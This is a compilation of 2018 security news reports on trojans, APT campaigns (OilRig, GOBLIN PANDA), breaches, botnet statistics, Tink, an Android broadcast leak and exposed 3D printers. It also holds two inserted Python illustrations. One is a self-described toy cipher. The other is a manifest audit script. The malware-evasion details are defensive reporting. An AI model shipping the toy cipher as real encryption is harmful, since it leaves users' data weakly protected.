“Please note that if you visited any site or made use of another extension that sends plain-text credentials through POST requests, either by direct form submission or through a background XMLHttpRequest process (MEGA is not one of them) while the trojaned extension was active, consider that your credentials were compromised on these sites and/or applications.”

Users who had the malicious version 3.39.4 of the MEGA Chrome browser extension installed must uninstall it and change the passwords for all their accounts.

@SerHack published an interesting post on the hack, I suggest you read it.

New OilRig APT campaign leverages a new variant of the OopsIE Trojan
6.9.2018 securityaffairs APT

The Iran-linked APT group OilRig was recently observed using a new variant of the OopsIE Trojan that implements new evasion capabilities.
Experts at Palo Alto Networks observed a new campaign carried out by the Iran-linked APT group OilRig that leveraged a new variant of the OopsIE Trojan.

The OilRig group is an Iran-linked APT that has been active since at least 2015; since then it has mainly targeted organizations in the financial and government sectors in the United States and Middle Eastern countries.

The OopsIE Trojan is one of the malware families in the APT’s arsenal; it was first detected in February 2018.

In July the hackers leveraged a new variant of the Trojan that implements new anti-analysis and detection-evasion capabilities.

The OopsIE variant used in the last campaign begins its execution by performing a series of anti-analysis checks.

It checks CPU fan information (the first time the researchers have seen malware check CPU fan data), temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

The campaign also delivered the QUADAGENT backdoor, although experts noticed the group using a different malware for each targeted organization.

“In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT.” reads the analysis published by Palo Alto Networks.

“The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT.”

The hackers launched spear phishing attacks against a government agency using compromised email accounts at a government organization in the same country in the Middle East.

The OilRig hackers sent the phishing messages to the email address of a user group that had published documents regarding business continuity management, the subject of the messages was in Arabic, which translated to “Business continuity management training”.

The new OopsIE variant checks the TimeZone.CurrentTimeZone.DaylightName property and runs only if the value contains one of the strings Iran, Arab, Arabia, or Middle East.

The attack is highly targeted: this check restricts execution to five time zones covering ten countries.

The new variant uses www.windowspatch[.]com as its command and control domain. It sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task that runs a VBScript every three minutes to maintain persistence.

The malware supports various commands, it can write the output to a file and send it to the server, download a file to the system, read a specified file and upload its contents, and uninstall itself.

“The OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add capabilities to their tools while still functionally using the same tactics over and over again.” concludes the report.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

International clothing chain C&A in Brazil suffered a data breach
6.9.2018 securityaffairs Incident

The clothing chain C&A in Brazil suffered a cyber attack on its gift card/exchange system last week; hackers leaked data on Pastebin.
The international fashion retailer C&A suffered a data breach in Brazil; the company confirmed that hackers hit its gift card platform.

Hackers accessed records belonging to customers who purchased gift cards; the exposed data includes ID numbers, email addresses, the amount loaded onto the cards, order numbers and dates of purchase.

A member of the Fatal Error Crew hacker group who uses the moniker @joshua published on Pastebin the data of C&A customers who purchased gift cards online.

“Since you like to play with the data of others, we’ve decided to play around with your systems,” wrote hacker Joshua when he published the data.

“We would like to point out that we do not have the list of Gift Cards C&A or any other list of personal information of the customer; we mapped the same through the ID and only posted some internal information for staff. C&A confirms the invasion. We will not distribute any personal information on the internet since we do not endorse financial crimes. Customer data is secure; the few published GiftCards were in the return section, so they would be discarded. – Fatal Error Crew” reads a statement published by the Fatal Error Crew.

According to the Brazilian website Tecmundo, data of about 36,000 customers have been exposed in the attack.

“In a conversation with TecMundo, Joshua said that four million orders are exposed – Joshua says that “probably” there are data from two million different customers, considering more than one request per customer. Directly in the present card system, with their numbers, are exposed the data of 36 thousand.” reported TecMundo.


According to the Brazilian newspaper O Globo, the Public Ministry of the Federal District and Territories (MPDFT) has launched an investigation into the data breach, fearing that data on 2 million C&A customers was leaked online.

The company confirmed that it detected the incident last week and immediately started its incident response procedures; it also reported the intrusion to the authorities.

C&A highlighted that it doesn’t use personal data for any unauthorized purposes.

“We reiterate our commitment to ethics and respect to the laws and that we work to offer the best possible experience to our customers, and that includes the online environment.” added C&A.

What are botnets downloading?
5.9.2018 Kaspersky BotNet

Statistics for the past year on files downloaded by botnets
Spam mailshots with links to malware and bots downloading other malware are just a couple of botnet deployment scenarios. The choice of infectious payload is limited only by the imagination of the botnet operator or customer. It might be ransomware, a banker, a miner, a backdoor; the list goes on, and you don’t need to go far for examples: take GandCrab and Trik, or Locky and Necurs, for instance. Every day we intercept numerous file-download commands sent to bots of various types and families. Here we present the results of our botnet activity analysis for H2 2017 and H1 2018.

Excluded from the statistics are update files downloaded by bots, since their number depends heavily on the algorithm of the particular malware in question and would skew the final distribution. The analysis also excludes configuration files, whose download depends on the botnet algorithm and is not relevant to this article. Furthermore, we only counted unique files (by MD5 hash). The results are based on the analysis of commands from more than 60,000 different C&C servers associated with 150 bot families and their modifications.

Kaspersky Lab tracks the activity of botnets using Botnet Tracking, a technology that emulates infected computers (bots) to retrieve operational data about the actions of botnet operators.

The total number of unique malicious files downloaded by our bots in H1 2018 fell by 14.5% against H2 2017.

Number of unique malicious files, H2 2017 — H1 2018 (download)

Most popular
After analyzing the files downloaded by the bots, we identified the most widespread families. Note that the top of the list of most “popular” downloads changes little over time. In 2018, as last year, the backdoor njRAT accounted for many downloads. Its share among all files downloaded by bots increased from 3.7% to 5.2%, meaning that more than one in every 20 bot-downloaded files is njRAT. This widespread distribution is due to the variety of versions of the malware and the ease of setting up one’s own backdoor, which creates a low entry threshold.

Rank   H2 2017         Share    H1 2018         Share
1      Lethic          17.0%    njRAT           5.2%
2      Neutrino.POS    4.6%     Lethic          5.0%
3      njRAT           3.7%     Khalesi         4.9%
4      Emotet          3.5%     Miners          4.6%
5      Miners          2.9%     Neutrino.POS    2.2%
6      Smoke           1.8%     Edur            1.3%
7      Cutwail         0.7%     PassView        1.3%
8      Ransomware      0.7%     Jimmy           1.1%
9      SpyEye          0.5%     Gandcrab        1.1%
10     Snojan          0.3%     Cutwail         1.1%
Most downloaded threats (share of unique files downloaded by bots), H2 2017 and H1 2018

Very often, botnets are used to distribute cryptocurrency mining tools. In H1 2018 miners accounted for 4.6% of all downloaded files, a far higher figure than in H2 2017 (2.9%).

Yet cybercriminal interest in ordinary currencies remains high, as evidenced by the presence of Neutrino.POS and Jimmy in the Top 10. In H2 2017, Neutrino.POS was downloaded in 4.6% of all cases. In 2018, its share in the overall stream of downloaded files declined, but its “cousin” Jimmy helped out by adding 1.1% to the share of banking Trojans.

Distribution map of the Top 10 downloaded threats, H2 2017 (download)

In H1 2018, the Trojan Khalesi was in third place in our ranking, accounting for 4.9% of downloaded files. But while in 2017 the Remcos, BetaBot, Smoke, and Panda bots were involved in downloading the Trojan, in 2018 Khalesi was downloaded only by the spam bot Lethic.

On a separate note, the H1 2018 Top 10 features Mail PassView, a legal password recovery tool for various email clients. Distributed via the Remcos backdoor, it is likely used to obtain passwords for victim mailboxes.

The Cutwail, Lethic, and newly rebranded Emotet bots are also firmly rooted in the Top 10.

Compared to H2 2017, the number of ransomware encryptors downloaded by bots has risen this year. Despite the overall decline in the distribution of ransomware programs, botnet operators continue to deliver them to victims. According to our data, most ransomware programs in 2017 were downloaded by the Smoke bot, but in 2018 the top spot was taken by Nitol. GandCrab ransomware is a newcomer to the Top 10 most downloaded families of 2018. It appeared in 2018 and was immediately deployed and distributed by several botnet operators, most actively by Trik.

Distribution map of the Top 10 downloaded threats, H1 2018 (download)

In terms of behavior, the clear leaders in both halves are Trojans with such diverse capabilities that it’s difficult to pinpoint their “specialization.” A significant proportion is made up of bankers and backdoors ensuring maximum theft of important information. What’s more, last year’s most common malware included a large number of spam bots, largely due to the above-mentioned Lethic.

Distribution of downloaded files by behavior, H2 2017 — H1 2018 (download)

Most “versatile”
Among the families under observation, we identified the most “versatile” — that is, those downloading the largest number of different files. Such diversity can be the result of several factors:

Different botnets from the same family are managed by different operators with varying objectives.
Operators “lease” their botnets, allowing them to be used to distribute malware.
A botnet changes its “specialization” (for example, Emotet turned from a banking Trojan into a spam bot).
In 2018, as in 2017, the most “versatile” bots were Hworm, Smoke, and BetaBot (a.k.a. Neurevt).

Distribution of downloaded files by behavior for Hworm, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Smoke, H2 2017 — H1 2018 (download)

Distribution of downloaded files by behavior for Betabot, H2 2017 — H1 2018 (download)

As we already mentioned, hidden mining software is very popular, as confirmed by the statistics. Despite the variety of downloaded malware, miners invariably end up in the Top 3.

Backdoors also feature heavily due to the wide-ranging options they provide for cybercriminals, from saving screenshots and keystrokes to direct control over the target device.

Most “international”
In terms of territorial distribution of control servers, the backdoor Njrat unsurprisingly claimed the “most international” prize, with C&C centers in 99 countries. This geographical scope is down to the ease of configuring a personal backdoor, allowing anyone to create their own botnet with minimal knowledge of malware development.

Distribution map of Njrat C&C centers, H2 2017 — H1 2018 (download)

Next come the backdoors DarkComet and NanoCore RAT. They share silver and bronze, having C&Cs in almost 80 countries worldwide. Despite the arrest of the creator of NanoCore, he managed to sell the source code of his privately developed RAT, which is now actively used by other cybercriminals.

Distribution map of DarkComet C&C centers, H2 2017 — H1 2018 (download)

Distribution map of NanoCore RAT C&C centers, H2 2017 — H1 2018 (download)

A look at the geography of infection targets reveals that another backdoor, QRAT, has the largest reach. In H2 2017, we registered infection attempts in 190 countries, and this year QRAT added two more countries, bringing the total to 192.

QRAT distribution map, H2 2017 — H1 2018 (download)

This extensive scope is due to the SaaS (Software-as-a-Service), or rather MaaS (Malware-as-a-Service), distribution model: QRAT can be purchased for 30 or 90 days, or for one year. Its cross-platform nature (the malware is written in Java) also plays a role.

By intercepting bot commands, we can track the latest trends in the world of virus writers and provide maximum protection for our users.

Here are the main trends that we identified from analyzing files downloaded by bots:

The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for mining cryptocurrency.
Backdoors consistently make up the bulk of downloads; that is, botnet operators are keen to gain maximum possible control over infected devices.
The number of downloaded droppers is also on the rise, indicative of attacks that are multistage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers (see above).
Increasingly, botnets are leased according to the needs of the customer, and in many cases it is difficult to pinpoint the “specialization” of the botnet.

IoT Category Added to Pwn2Own Hacking Contest
5.9.2018 securityweek  Congress

This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.

The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.

Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.

In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.

In the web browsers category, security experts can receive a cash prize of $25,000 for hacking the default browser on the Huawei P20, Xiaomi Mi6 and Samsung Galaxy S9, and $50,000 for a successful exploit against the browsers on Apple’s iPhone X and Google’s Pixel 2.

In the short distance category, which includes Wi-Fi, Bluetooth, and near field communication (NFC), ZDI is offering up to $30,000 and up to $60,000 – exploits targeting devices from Apple and Google are worth the higher amount.

Hacking a device simply by sending it a SMS/MMS message or getting its owner to view a message can earn Pwn2Own Tokyo contestants as much as $75,000.

The highest rewards are offered this year for baseband attacks, which involve the target device communicating with a rogue base station. Researchers can get up to $50,000 for a successful exploit against Huawei, Xiaomi and Samsung devices, and up to $150,000 for hacking Apple and Google phones.

Pwn2Own Tokyo prizes

In the browser and short-range categories, participants can earn an extra $20,000 if their exploit payload is executed with kernel privileges. There is also a persistence bonus for these categories: $50,000 if the exploit survives a reboot on an iPhone X, and $25,000 if it survives a reboot on a Pixel 2.

Registration for Pwn2Own Tokyo closes on November 7 at 5:00 p.m. Japan Standard Time.

At last year’s event, hackers earned more than half a million dollars after successfully demonstrating exploits against the Samsung Galaxy S8, the Apple iPhone 7 and the Huawei Mate 9 Pro. No attempts were made against the Google Pixel.

Google Introduces Open Source Cross-Platform Crypto Library
5.9.2018 securityweek  Crypto

Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.

Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.

Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.

Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.

Tink can simplify many common cryptographic operations. Data encryption, digital signatures, and more would only require a few lines of code, the Internet giant claims.

The library provides cryptographic APIs that Google says are secure and easy to use correctly, yet hard to misuse.

“Tink aims to eliminate as many potential misuses as possible. For example, if the underlying encryption mode requires nonces and nonce reuse makes it insecure, then Tink does not allow the user to pass nonces,” Google explains.
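To show why removing the nonce from the interface matters, here is an added illustration in Python that is not part of Tink or of Google's announcement. It uses a toy HMAC-based keystream (assumed here for demonstration only, not a real cipher) to contrast a nonce-taking API, under which reusing a nonce leaks the XOR of two plaintexts, with a Tink-style Aead interface that exposes only encrypt(plaintext, associated_data) and decrypt(ciphertext, associated_data) and draws the nonce itself:

```python
import hashlib
import hmac
import os


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy CTR-style keystream: HMAC-SHA256(key, nonce || counter) blocks (not a real cipher)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- Misuse-prone API: the caller chooses the nonce ---------------------------------------
def stream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypts by XOR with the keystream. Safe only if (key, nonce) is never reused."""
    return _xor(plaintext, _keystream(key, nonce, len(plaintext)))


def nonce_reuse_leak(ct1: bytes, ct2: bytes) -> bytes:
    """What an eavesdropper gets from two ciphertexts under the same key and nonce:
    ct1 XOR ct2 == pt1 XOR pt2, i.e. the keystream cancels and plaintext structure leaks."""
    return _xor(ct1, ct2)


# --- Tink-style API: no nonce parameter at all ---------------------------------------------
class ToyAead:
    """encrypt(plaintext, associated_data) / decrypt(ciphertext, associated_data), shaped like
    Tink's Aead primitive. The nonce comes from os.urandom on every call and travels inside the
    ciphertext; an HMAC tag over nonce, ciphertext and associated data rejects tampering."""

    NONCE_LEN = 16
    TAG_LEN = 32

    def __init__(self, key: bytes):
        # Derive independent encryption and MAC keys from the single input key.
        self._enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
        self._mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()

    def _tag(self, nonce: bytes, ct: bytes, aad: bytes) -> bytes:
        # Length-prefix the associated data so the aad / nonce||ct boundary is unambiguous.
        msg = len(aad).to_bytes(8, "big") + aad + nonce + ct
        return hmac.new(self._mac_key, msg, hashlib.sha256).digest()

    def encrypt(self, plaintext: bytes, associated_data: bytes = b"") -> bytes:
        nonce = os.urandom(self.NONCE_LEN)  # fresh per call; the caller cannot pass one in
        ct = stream_encrypt(self._enc_key, nonce, plaintext)
        return nonce + ct + self._tag(nonce, ct, associated_data)

    def decrypt(self, ciphertext: bytes, associated_data: bytes = b"") -> bytes:
        if len(ciphertext) < self.NONCE_LEN + self.TAG_LEN:
            raise ValueError("ciphertext too short")
        nonce = ciphertext[: self.NONCE_LEN]
        tag = ciphertext[-self.TAG_LEN :]
        ct = ciphertext[self.NONCE_LEN : -self.TAG_LEN]
        if not hmac.compare_digest(tag, self._tag(nonce, ct, associated_data)):
            raise ValueError("authentication failed")
        return stream_encrypt(self._enc_key, nonce, ct)
```

The leak is the point: with the first API every caller must get nonce handling right, with the second there is no parameter to get wrong. Real Tink wraps primitives such as BoringSSL's AES-GCM rather than this toy keystream, but the interface shape is the same.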

The goal when building the library was to make it easy to improve product security. Thus, Tink shows the claimed security properties right in the interfaces, so that both security auditors and automated tools can quickly find instances where the security guarantees don’t match the security requirements.

Furthermore, the library isolates APIs for potentially dangerous operations, thus enabling the discovery, restriction, monitoring, and logging of these APIs’ usage.

The library also includes key management support, covering key rotation and the phasing out of deprecated ciphers, Google says.

Also designed to be extensible, Tink simplifies the addition of custom cryptographic schemes or in-house key management systems. Its components are easy to replace or remove, and all of them “are composable, and can be selected and assembled in various combinations,” Google says.

This means that anyone who only needs digital signatures, for example, can simply exclude symmetric key encryption components from the library, thus minimizing code size in their application.

'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.2018 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."

Android System Broadcasts Expose Device Information
5.9.2018 securityweek  Android

Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.

The exposed information includes the Wi-Fi network name (SSID), the BSSID, local IP addresses, DNS server information, and the device's MAC address. Normally, extra permissions are required to access such details, but the Wi-Fi broadcasts let any application capture the information, bypassing those permission checks.

Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.

Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, the security firm says. Thus, all devices running those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.

The root cause, the security researchers say, is a familiar one: whoever sends an “Intent” neglects to restrict who may receive it or to mask the sensitive data it carries. Intents are system-wide messages that both apps and the OS can send and that any other application can listen for; in this case the sender is the Android platform itself.

The Android platform, the security researchers explain, regularly broadcasts information about the WiFi connection and the WiFi network interface and uses WifiManager’s NETWORK_STATE_CHANGED_ACTION and WifiP2pManager’s WIFI_P2P_THIS_DEVICE_CHANGED_ACTION Intents for that.

“This information includes the MAC address of the device, the BSSID and network name of the WiFi access point, and various networking information such as the local IP range, gateway IP and DNS server addresses. This information is available to all applications running on the user’s device,” the researchers note.

Applications looking to access the information via the WifiManager would normally require the “ACCESS_WIFI_STATE” permission in the application manifest. Apps looking to access geolocation via WiFi require the “ACCESS_FINE_LOCATION” or “ACCESS_COARSE_LOCATION” permissions.

Applications listening for system broadcasts, however, need none of these permissions and can capture the details without the user’s knowledge. They can even obtain the real hardware MAC address, which the regular APIs stopped returning in Android 6.

“We performed testing using a test farm of mobile device ranging across multiple types of hardware and Android versions. All devices and versions of Android tested confirmed this behavior, although some devices do not display the real MAC address in the “NETWORK_STATE_CHANGED_ACTION” intent but they still do within the “WIFI_P2P_THIS_DEVICE_CHANGED_ACTION” intent,” the researchers said.
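As an added check that is not part of Nightwatch's research, the following Python script audits an AndroidManifest.xml for receivers subscribed to the two broadcasts named above. The action strings are the string values of the two constants (android.net.wifi.STATE_CHANGE and android.net.wifi.p2p.THIS_DEVICE_CHANGED); the sample manifest is constructed for the example:

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS

# String values behind the two intent constants named in the article.
LEAKY_ACTIONS = {
    "android.net.wifi.STATE_CHANGE": "WifiManager.NETWORK_STATE_CHANGED_ACTION",
    "android.net.wifi.p2p.THIS_DEVICE_CHANGED": "WifiP2pManager.WIFI_P2P_THIS_DEVICE_CHANGED_ACTION",
}

# Permissions an app would otherwise need to read the same data through the normal APIs.
WIFI_PERMS = {
    "android.permission.ACCESS_WIFI_STATE",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_COARSE_LOCATION",
}


def audit_manifest(manifest_xml: str) -> dict:
    """Return the receivers registered for the leaky Wi-Fi broadcasts and whether the app
    also declares a permission that would legitimately grant it Wi-Fi or location access."""
    root = ET.fromstring(manifest_xml)
    declared = {p.get(NAME) for p in root.iter("uses-permission")}
    findings = []
    for receiver in root.iter("receiver"):
        for action in receiver.iter("action"):
            name = action.get(NAME)
            if name in LEAKY_ACTIONS:
                findings.append({
                    "receiver": receiver.get(NAME),
                    "action": name,
                    "constant": LEAKY_ACTIONS[name],
                })
    return {
        "declares_wifi_or_location_permission": bool(declared & WIFI_PERMS),
        "findings": findings,
    }


# Constructed sample: an app with no Wi-Fi or location permission that still subscribes
# to both broadcasts, which is the situation the researchers describe.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.flashlight">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Flashlight">
    <receiver android:name=".NetListener" android:exported="true">
      <intent-filter>
        <action android:name="android.net.wifi.STATE_CHANGE"/>
        <action android:name="android.net.wifi.p2p.THIS_DEVICE_CHANGED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""
```

Receivers registered at runtime with Context.registerReceiver() never appear in the manifest, so a clean manifest is a partial result and the decompiled code needs the same search for those two strings. An app with a finding and no Wi-Fi or location permission is exactly the case the researchers describe: it obtains network identifiers and the MAC address that the permission model was meant to gate.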

Given that Google addressed the issue in Android 9 only, users are encouraged to upgrade to this platform iteration to ensure they remain protected.

GOBLIN PANDA Targets Vietnam Again
5.9.2018 securityweek 

CrowdStrike security researchers have observed renewed activity associated with GOBLIN PANDA, a threat actor mainly targeting entities in Southeast Asia.

First observed in 2013 and highly active in 2014, when a conflict over territory in the South China Sea was generating high tension, GOBLIN PANDA is known to focus on Vietnam. Also referred to as Cycldek, the actor has been primarily targeting entities in the defense, energy, and government sectors.

Last month, the group was observed targeting Vietnam once again, as part of a campaign that employed exploit documents featuring Vietnamese-language lures and themes. The adversary-controlled infrastructure leveraged as part of the attacks was Vietnam-themed as well.

The security researchers observed two exploit documents with Vietnamese-language file names that packed metadata unique to the GOBLIN PANDA adversary. When opened, the files display Microsoft Office Word documents with training-related themes as decoys.

“These documents did not specifically reference Vietnamese government projects or departments, however they could still be directed towards Government of Vietnam personnel,” CrowdStrike says.

These documents attempt to exploit an old Office vulnerability, namely CVE-2012-0158. The exploit code would drop the side-loading malware implant tracked as QCRat onto the compromised machine.

The documents, CrowdStrike discovered, use a “previously identified legitimate executable, and a side-loading implant Dynamic Link Library (DLL), as well as new implant configuration files stored as a .tlb file.”

While analyzing the command and control infrastructure associated with the campaign, the security researchers discovered indicators that the threat actor might be targeting entities in Laos as well. However, no attacks have been observed and CrowdStrike says it cannot confirm targets in Laos for this campaign, although GOBLIN PANDA has targeted this country before.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,” CrowdStrike concludes.

Facebook Chief Says Internet Firms in 'Arms Race' for Democracy
5.9.2018 securityweek 

Facebook chief Mark Zuckerberg said late Tuesday that the leading social network and other internet firms are in an arms race to defend democracy.

Zuckerberg's Washington Post op-ed came on the eve of hearings during which lawmakers are expected to grill top executives from Facebook and Twitter.

Google's potential participation is unclear.

The hearings come with online firms facing intense scrutiny for allowing the propagation of misinformation and hate speech, and amid allegations of political bias from the president and his allies.

"Companies such as Facebook face sophisticated, well-funded adversaries who are getting smarter over time, too," Zuckerberg said in an op-ed piece outlining progress being made on the front by the leading social network.

"It's an arms race, and it will take the combined forces of the US private and public sectors to protect America's democracy from outside interference."

After days of vitriol from President Donald Trump, big Silicon Valley firms face lawmakers with a chance to burnish their image -- or face a fresh bashing.

Twitter chief executive Jack Dorsey and Facebook chief operating officer Sheryl Sandberg were set to appear at a Senate Intelligence Committee hearing on Wednesday.

Lawmakers were seeking a top executive from Google or its parent Alphabet, but it remained unclear if the search giant would be represented.

Sources familiar with the matter said Google offered chief legal officer Kent Walker, who the company said is most knowledgeable on foreign interference, but that senators had asked for the participation of CEO Sundar Pichai or Alphabet CEO Larry Page.

Dorsey testifies later in the day at a hearing of the House Energy and Commerce Committee on online "transparency and accountability."

The tech giants are likely to face a cool reception at best from members of Congress, said Roslyn Layton, an American Enterprise Institute visiting scholar specializing in telecom and internet issues.

"The Democrats are upset about the spread of misinformation in the 2016 election, and the Republicans over the perception of bias," Layton said.

"They are equally angry, but for different reasons."

Kathleen Hall Jamieson, a University of Pennsylvania professor and author of an upcoming book on Russia's role in election hacking, said the hearings could give the companies a platform to explain how they operate.

"Hearings are an opportunity as well as a liability," she said.

"These companies have put in place fixes (on foreign manipulation) but they have done it incrementally, and they have not communicated that to a national audience."

Hackers can easily access 3D printers exposed online for sabotage and espionage
5.9.2018 securityaffairs CyberSpy

Security researchers at the SANS Internet Storm Center discovered that thousands of 3D printers are exposed online without proper defense.
The news is worrisome: thousands of 3D printers are exposed online to remote cyber attacks. Experts at the SANS Internet Storm Center scanned the internet for vulnerable 3D printers, and a Shodan query found more than 3,700 instances of OctoPrint interfaces exposed online, the largest share of them (roughly 1,600) in the United States.

The OctoPrint is a free and open source web interface for 3D printers that could be used to remotely monitor and control the devices.


Users control print jobs through the interface, so unauthorized access could be used for malicious activities, including sabotage and cyber espionage.

“So, what can go wrong with this kind of interface? It’s just another unauthenticated access to an online device. Sure but the printer owners could face very bad situations.” reads the analysis published by the experts.

“The interface allows downloading the 3D objects loaded in the printer. Those objects are in G-code format. To make it simple, G-code is a language in which people tell computerized machine tools how to make something. G-code files are simple text files and are not encrypted.”

Experts warn that G-code files can be downloaded by attackers, which could leak trade secrets, and then manipulated for sabotage.

“Indeed, many companies’ R&D departments are using 3D printers to develop and test some pieces of their future product,” the experts continue.

“Worse, what if the attacker downloads a G-code file, alters it and re-uploads it. By changing the G-code instructions, you will instruct the device to print the object but the altered one won’t have the same physical capabilities and could be a potential danger once used,” the experts conclude.

“Think about 3D-printed guns but also 3D-printed objects used in drones. Drone owners are big fans of self-printed hardware.”

Experts highlighted that 3D printers could also be used to start a fire, given the high temperatures reached during printing. Attackers can also abuse the monitoring feature: the printer’s embedded webcam can be accessed remotely.

The OctoPrint development team recommends enabling the Access Control feature, so that not just anyone can remotely gain full control over the printer, and urges additional measures to secure 3D printers if remote access is required.

“If you plan to have your OctoPrint instance accessible over the internet, always enable Access Control and ideally don’t make it accessible to everyone over the internet but instead use a VPN or at the very least HTTP basic authentication on a layer above OctoPrint,” states the OctoPrint documentation.

Thousands of 3D Printers Exposed to Remote Attacks
4.9.2018 securityweek  Attack

Malicious actors could take control of thousands of 3D printers that can be accessed directly from the Internet without requiring any authentication.

According to the SANS Internet Storm Center, a Shodan search reveals over 3,700 instances of OctoPrint interfaces exposed to the Web, including nearly 1,600 in the United States.


OctoPrint is a free and open source web interface for 3D printers that allows users to monitor and control every aspect of their device and printing jobs. OctoPrint can be used to start, stop or pause a print job, it provides access to the printer’s embedded webcam, it supplies information on the progress of a print job, and monitors the temperature of key components.

While it may seem that failure to protect a 3D printer against unauthorized access cannot pose a major risk, SANS’s Xavier Mertens warns that an attacker can conduct a wide range of malicious activities.

For instance, they can access G-code files, which are text files that contain the instructions needed to print a 3D object. In the case of organizations, these files could store valuable trade secrets.

“Indeed, many companies’ R&D departments are using 3D printers to develop and test some pieces of their future product,” Mertens noted.

The researcher pointed out that an attacker could also upload specially crafted G-code files to an unprotected printer. They could instruct the device to start printing when nobody is around, or they could make small changes to the code.

